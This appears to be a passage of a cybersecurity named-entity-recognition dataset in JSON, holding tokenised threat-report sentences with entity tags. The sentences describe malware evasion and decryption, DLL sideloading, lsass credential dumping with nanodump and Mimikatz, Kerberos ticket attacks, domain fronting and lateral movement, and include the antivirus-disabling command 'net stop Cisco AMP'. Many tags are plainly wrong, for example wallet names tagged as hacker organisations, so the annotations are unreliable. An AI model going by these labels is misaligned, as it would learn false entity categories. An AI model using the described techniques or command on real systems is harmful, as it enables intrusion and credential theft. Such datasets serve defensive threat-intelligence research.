"tokens": [ "to", "authenticate", "to", "the", "site", "behind", "the", "onion", "link", "on", "the", "TOR", "network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ShellExecuteA", "is", "also", "used", "to", "launch" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "API", "call", "attempts", "to", "processes:" ], "ner_tags": [ "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "The", "local", "module", "utilizes", "the", "LookupPrivilegeValueW", "and", "AdjustTokenPrivileges", "that", "Windows", "API", "calls", "on", "its", "own", "process", "via", "GetCurrentProcess", "and", "OpenProcessToken", "to", "obtain", "SeDebugPrivilege", "privileges." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "Active", "Directory", "group", "policies", "allows", "the", "malicious", "actor", "to", "hit", "all", "systems", "in", "the", "environment", "for", "as", "long", "as", "that", "group", "policy", "is", "active", "in", "the", "victim’s", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Potential", "Process", "Hollowing" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "more", "sophisticated", "encryption" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "this", "technique", "for", "encryption-decryption", "is", "easily", "more", "discernable", "during", "analysis", "because", "both", "the", "encrypted", "data", "and", "the", "mapping", "are", "in", "the", "same", "file" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "for", "its", "execution", "technique", "of", "hiding", "malicious", "code", "inside", "log", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "bytes", "of", "the", "encrypted", "section", "is", "a", "specific", "index", "on", "the", "byte", "map" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Though", "this", "is", "a", "very", "rigid", "method", "of", "hiding", "its", "codes," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "byte", "remapping", "to", "ensure", "that", "the", "shellcode", "cannot", "be", "easily", "decrypted", "without", "the", "correct", "byte", "map" ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "usually", "the", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "shows", "that", "their", "offsets", "within", "the", "encrypted", "region", "remain", "the", "same", "since", "they", "result", "in", "a", "similar", "shellcode", "even", "if", "they", "are", "composed", "of", "different", "bytes", "per", "binary." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "checks", "if", "there", "are", "monitoring", "tools,", "specifically", "Process", "Monitor,", "running", "in", "the", "current", "machine", "with", "the", "following", "strings:", "procmon", "procmon64", "procmon64a" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "checks", "for", "a", "few", "installed", "and", "active", "antivirus", "products,", "namely:", "Windows", "Defender", "ESET" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SecTeam", "I-SecTeam", "I-SecTeam" ] }, { "tokens": [ "the", "malware", "proceeds", "to", "decrypt", "the", "PowerShell", "code" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Furthermore,", "since", "the", "data", "to", "be", "decrypted", "is", "in", "another", "file,", "the", "routine", "becomes", "even", "more", "difficult", "to", "investigate,", "as", "analysts", "would", "need", "the", "correct", "pair", "for", "decryption." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Afterward,", "the", "shellcode", "will", "then", "decrypt", "and", "load", "the", "main", "ViperSoftX", "DLL", "embedded", "within", "the", "carrier." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Moreover,", "all", "the", "strings,", "binaries,", "and", "other", "relevant", "data", "within", "the", "ViperSoftX", "DLL", "also", "gets", "decrypted", "the", "same", "way." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actual", "bytes", "of", "the", "decrypted", "shellcode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "crawl", "through", "different", "paths", "in", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "scans", "for", "these", "cryptocurrency", "wallets", "in", "local", "directories:", "Armory", "Atomic", "Wallet", "Binance", "Bitcoin", "Blockstream", "Green", "Coinomi", "Delta", "Electrum", "Exodus", "Guarda", "Jaxx", "Liberty", "Ledger", "Live", "Trezor", "Bridge" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "B-Idus", "I-HackOrg", "I-HackOrg", "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "B-HackOrg", "O" ] }, { "tokens": [ "the", "use", "of", "DLL", "sideloading", "for", "its", "arrival", "and", "execution", "technique." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "found", "in", "the", "sideloaded", "DLL." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "sideloaded", "DLL)," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "DLL", "sideloading" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "While", "other", "cybercriminals", "use", "sideloading", "to", "load", "another", "non-binary", "component" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "We", "have", "also", "found", "that", "each", "sideloader", "DLL", "has", "its", "own", "pair", "of", "executable", "and", "byte", "map," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "still", "downloads", "a", "PowerShell", "code" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "or", "Windows", "Scripting" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "File-packed", "Magniber", "ransomware" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "To", "obtain", "the", "credentials,", "the", "team", "took", "a", "snapshot", "of", "lsass.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "with", "a", "tool", "called", "nanodump,", "exported", "the", "output,", "and", "processed", "the", "output", "offline", "with", "Mimikatz." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "team", "obtained", "the", "cached", "credentials", "from", "a", "SharePoint", "server", "account", "by", "taking", "a", "snapshot", "of", "lsass.exe", "with", "a", "tool", "called", "nanodump,", "exporting", "the", "output", "and", "processing", "the", "output", "offline", "with", "Mimikatz." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "They", "then", "used", "forged", "credentials", "to", "move", "to", "multiple", "hosts", "across", "different", "sites", "in", "the", "environment", "and", "eventually", "gained", "root", "access", "to", "all", "workstations", "connected", "to", "the", "organization’s", "mobile", "device", "management", "(MDM)", "server." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "used", "this", "root", "access", "to", "move", "laterally", "to", "SBS-connected", "workstations." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "team", "attempted", "to", "determine", "valid", "accounts", "based", "on", "group", "name", "and", "purpose" ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "attempted", "to", "leverage", "these", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "From", "that", "host,", "the", "team", "moved", "laterally", "to", "a", "misconfigured", "server,", "from", "which", "they", "compromised", "the", "domain", "controller", "(DC)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "with", "a", "button,", "which,", "when", "clicked,", "downloaded", "a", "“malicious”", "ISO", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "the", "download,", "another", "button", "appeared,", "which,", "when", "clicked,", "executed", "the", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Users", "downloaded", "and", "executed", "the", "team’s", "initial", "access", "payloads", "after", "clicking", "buttons", "to", "trigger", "download", "and", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "used", "compromised", "workstation", "and", "domain", "admin", "accounts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Use", "a", "previously", "compromised", "workstation", "admin", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Use", "a", "previously", "compromised", "domain", "admin", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "team", "leveraged", "compromised", "workstation", "and", "domain", "admin", "accounts", "to", "execute", "a", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "team", "compromised", "a", "domain", "admin", "account", "and", "used", "it", "to", "laterally", "to", "multiple", "workstations", "and", "the", "DC." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "used", "compromised", "workstation", "and", "domain", "admin", "accounts", "to", "upload", "a", "payload", "via", "SMB", "on", "several", "target", "Workstations", "and", "the", "DC." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Use", "a", "previously", "compromised", "workstation", "admin", "account", "to", "upload", "and", "execute", "a", "payload", "via", "SMB" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Use", "a", "previously", "compromised", "domain", "admin", "account", "to", "upload", "and", "execute", "a", "payload", "via", "SMB" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "team’s", "C2", "redirectors", "used", "HTTPS", "reverse", "proxies", "to", "redirect", "C2", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "used", "HTTPS" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "HTTPS", "beacon" ], "ner_tags": [ "O", "B-Way", "B-Tool" ] }, { "tokens": [ "post-exploit", "tool", "that", "leverages", "HTTP", "protocols", "for", "C2", "traffic." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "used", "HTTPS", "reverse", "proxies", "to", "redirect", "C2", "traffic" ], "ner_tags": [ "O", "B-Way", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Establish", "a", "session", "that", "originates", "from", "a", "target", "Workstation", "system", "directly", "to", "an", "external", "host", "over", "a", "clear", "text", "protocol,", "such", "as", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Establish", "a", "session", "that", "originates", "from", "a", "target", "Domain", "Controller", "system", "directly", "to", "an", "external", "host", "over", "a", "clear", "text", "protocol,", "such", "as", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "used", "HTTPS", "reverse", "proxies", "to", "redirect", "C2", "traffic." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "the", "team", "uploaded", "and", "executed", "well-known", "malicious", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "to", "download", "and", "execute", "a", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Upload", "and", "execute", "a", "well-known", "(e.g.,", "with", "a", "signature)", "malicious", "file", "to", "a", "target", "DC", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "redirectors", "to", "redirect", "C2", "traffic", "between", "the", "target", "organization’s", "network", "and", "the", "team’s", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "HTTPS", "reverse", "proxies", "to", "redirect", "C2", "traffic", "between", "target", "network", "and", "the", "team’s", "Cobalt", "Strike", "servers." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "The", "team", "used", "these", "platforms", "to", "create", "flexible", "and", "dynamic", "redirect", "servers", "to", "send", "traffic", "to", "the", "team’s", "Cobalt", "Strike", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "redirectors", "used", "HTTPS", "reverse", "proxies", "to", "redirect", "C2", "traffic", "between", "the", "target", "organization’s", "network", "and", "the", "Cobalt", "Strike", "team", "servers" ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-SecTeam", "O", "O" ] }, { "tokens": [ "The", "team", "used", "domain", "fronting", "to", "disguise", "outbound", "traffic", "in", "order", "to", "diversify", "the", "domains", "with", "which", "the", "persistent", "beacons", "were", "communicating." ], "ner_tags": [ "O", "O", "O", "I-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "B-SamFile", "I-Purp", "I-Purp", "O", "O", "O", "I-Way", "O", "O", "O" ] }, { "tokens": [ "The", "team", "used", "domain", "fronting", "[T1090.004]", "to", "disguise", "outbound", "traffic", "in", "order", "to", "diversify", "the", "domains", "with", "which", "the", "persistent", "beacons", "were", "communicating" ], "ner_tags": [ "O", "O", "O", "B-Tool", "B-Tool", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "technique,", "which", "also", "leverages", "CDNs,", "allows", "the", "beacon", "to", "appear", "to", "connect", "to", "third-party", "domains,", "such", "as", "nytimes.com,", "when", "it", "is", "actually", "connecting", "to", "the", "team’s", "redirect", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "technique", "leverages", "CDNs", "associated", "with", "high-reputation", "domains", "so", "that", "the", "malicious", "traffic", "appears", "to", "be", "directed", "towards", "a", "reputation", "domain", "but", "is", "actually", "redirected", "to", "the", "red", "team-controlled", "Cobalt", "Strike", "servers." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "which", "prompted", "DC", "authentication", "to", "the", "SharePoint", "server", "using", "the", "server’s", "NTLM", "hash.", "The", "team", "then", "deployed", "Rubeus", "to", "capture", "the", "incoming", "DC", "TGT" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "performed", "an", "NTLM-relay", "attack", "to", "obtain", "the", "DC’s", "TGT,", "followed", "by", "a", "golden", "ticket", "attack", "on", "a", "SharePoint", "server", "with", "Unconstrained", "Delegation", "to", "gain", "the", "ability", "to", "impersonate", "any", "Site", "1", "AD", "account." ], "ner_tags": [ "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "ran", "the", "DFSCoerce", "python", "script,", "which", "prompted", "DC", "authentication", "to", "a", "server", "using", "the", "server’s", "NTLM", "hash.", "The", "team", "then", "deployed", "Rubeus", "to", "capture", "the", "incoming", "DC", "TGT." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "ran", "the", "DFSCoerce", "python", "script,", "which", "prompted", "DC", "authentication", "to", "a", "server", "using", "the", "server’s", "NTLM", "hash" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "some", "instances,", "they", "used", "Windows", "Management", "Instrumentation", "(WMI)", "Event", "Subscriptions" ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O" ] }, { "tokens": [ "The", "team", "used", "WMI", "Event", "Subscriptions", "to", "move", "laterally", "between", "sites." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "command-line", "tool" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "which", "stored", "credentials", "in", "a", "database", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "searched", "files", "on", "the", "server,", "and", "found", "plaintext", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "plaintext", "credentials", "in", "PowerShell", "scripts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "team", "found", "a", ".txt", "file", "containing", "plaintext", "credentials", "for", "the", "user" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "found", "plaintext", "credentials", "to", "an", "API", "user", "account", "stored", "in", "PowerShell", "scripts", "on", "an", "MDM", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "the", "pattern", "discovered", "in", "these", "credentials,", "the", "team", "was", "able", "to", "crack", "the", "user’s", "workstation", "account", "password" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "cracked", "a", "user’s", "workstation", "account", "password", "after", "learning", "the", "user’s", "patterns", "from", "plaintext", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Detect", "and", "Identify", "source", "IP" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Detect", "and", "Identify", "source", "IP" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Detect", "and", "identify", "source", "IP" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Detect", "and", "identify", "source", "IP" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Detect", "and", "identify", "source", "IP" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "Service", "Creation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Windows", "Service", "Creation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Windows", "Service", "Creation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "execute", "a", "payload", "via", "SMB", "and", "Windows", "Service", "Creation,", "respectively,", "on", "several", "target", "Workstations." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "execute", "a", "payload", "via", "SMB", "and", "Windows", "Service", "Creation,", "respectively,", "on", "a", "target", "DC." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "execute", "a", "payload", "via", "Windows", "Service", "Creation", "on", "target", "workstations", "and", "the", "DC." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "used", "the", "organization’s", "MDM", "system", "to", "gain", "root", "access", "to", "machines", "across", "the", "organization’s", "network", "without", "being", "detected." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "krbtgt", "account", "is", "a", "domain", "default", "account" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Use", "of", "non-secure", "default", "configurations" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "organization", "used", "default", "configurations", "for", "hosts", "with", "Windows", "Server", "2012", "R2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "default", "configuration", "allows", "unprivileged", "users", "to", "query", "group", "membership", "of", "local", "administrator", "groups" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "red", "team", "used", "and", "identified", "several", "standard", "user", "accounts", "with", "administrative", "access", "from", "a", "Windows", "Server", "2012", "R2", "SharePoint", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "team", "discovered", "several", "standard", "user", "accounts", "that", "have", "local", "administrator", "access", "to", "critical", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "misconfiguration", "allowed", "the", "team", "to", "use", "the", "low-level", "access", "of", "a", "phished", "user", "to", "move", "laterally", "to", "an", "Unconstrained", "Delegation", "host", "and", "compromise", "the", "entire", "domain." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "a", "user", "with", "administrative", "access", "is", "compromised,", "an", "actor", "can", "access", "servers", "without", "needing", "to", "elevate", "privileges" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "workstations", "allowed", "unprivileged", "accounts", "to", "have", "local", "administrator", "access" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "keylogged", "a", "user", "during", "a", "mandatory", "password", "change" ], "ner_tags": [ "B-SamFile", "B-Purp", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "spear", "phishing", "attachments." ], "ner_tags": [ "I-Way", "O", "B-Way" ] }, { "tokens": [ "spear", "phishing", "attachments", "for", "Initial", "Access" ], "ner_tags": [ "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "attackers", "can", "quickly", "change", "spear", "phishing", "attachments" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Way", "O", "B-Way" ] }, { "tokens": [ "suspicious", "email", "attachments", "or", "other", "phishing", "techniques." ], "ner_tags": [ "O", "I-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "modification", "of", "Registry", "Keys/Startup", "folder", "for", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "valid", "accounts" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "valid", "accounts" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "and", "protocols,", "such", "as", "for", "Remote", "Desktop", "Protocol" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool" ] }, { "tokens": [ "used", "to", "download", "files…" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "second", "stage", "payload,", "which", "was", "later", "determined", "to", "likely", "be", "the", "penetration", "testing", "framework", "\"Brute", "Ratel,\"", "was", "then", "downloaded", "via", "a", "connection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "“RClone”", "was", "downloaded", "on", "the", "file", "servers" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "allowed", "the", "threat", "actor", "to", "move", "freely", "between", "domains." ], "ner_tags": [ "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Two", "\".bat\"", "files", "were", "sent", "throughout", "the", "organization." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "before", "running", "the", "\".cmd\"", "file", "contained", "within", "the", "ISO." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "this", "CMD", "file", "calls", "the", "\"db\"", "file.", "In", "both", "samples," ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ ".bat", "files" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "USING", "\".BAT\"", "FILES" ], "ner_tags": [ "B-Way", "B-Way", "B-Way" ] }, { "tokens": [ "The", "two", "\".bat\"", "files", "that", "were", "sent" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "cc.bat", "is", "a", "simple", "script" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "w.bat", "as", "viewed", "through", "the", "bash", "command", "\"cat\":" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "these", "are", "the", "same", "commands", "as", "observed", "in", "the", "\".bat\"", "files:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Both", "were", "designed", "to", "turn", "off", "antivirus", "and", "anti-malware", "software." ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-HackOrg", "O" ] }, { "tokens": [ ".bat", "files", "designed", "to", "disable", "Cisco", "AMP", "/", "Microsoft", "Defender" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "command", "\"net", "stop", "Cisco", "AMP\"." ], "ner_tags": [ "O", "O", 